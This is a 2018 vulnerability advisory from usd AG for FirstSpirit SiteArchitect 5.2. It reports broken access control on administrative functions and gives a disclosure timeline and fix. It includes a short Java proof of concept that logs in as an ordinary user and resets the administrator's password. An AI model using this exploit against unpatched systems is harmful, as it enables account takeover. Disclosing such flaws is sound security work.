usd-2018-0012 | FirstSpirit SiteArchitect/5.2
Advisory ID: usd-2018-0012
CVE Number: N/A
Affected Product: FirstSpirit SiteArchitect
Affected Version: 5.2
Vulnerability Type: Improper Access Control
Security Risk: High
Vendor URL: https://www.e-spirit.com/de/
Vendor Status: Fixed according to vendor in version 5.2.2109
Description
Administrative functions are not properly protected by access control. This allows attackers access to administrative function such as changing passwords or adding new users.
Access control involves the use of several protection mechanisms such as authentication, authorization and accountability. When any mechanism is not applied or otherwise fails, attackers can compromise the security of the software by gaining privileges, reading sensitive information, executing commands, evading detection, etc.
Proof of Concept
Generic example case:
ConnectionManager.setProxy((Proxy) null);
ConnectionManager.setCompression((byte) 0);
ConnectionManager.setEncryption((byte) 2);
ConnectionManager.setUseHttps(false);
ServerConnection c = (ServerConnection) ConnectionManager.getConnection("", 8000, 1, "user", "password");
c.connect();
UserManager userManager = c.getManager(UserManager.class);
UserDTO admin = userManager.getAdminUser();
admin.setPassword("test");
userManager.updateUserData(admin);
}
Fix
Access to sensitive functions should be avoided. Necessary access should be protected by authentication and a global access control explicitly.
Timeline
- 2018-04-04 First contact request via info@e-spirit.com
- 2018-04-24 Send vulnerabilities to vendor
- 2018-05-15 Vendor releases a patch to fix the vulnerabilities
- 2018-07-06 Security advisory released
Credits
This security vulnerabilities were found by Sebastian Puttkammer of usd AG.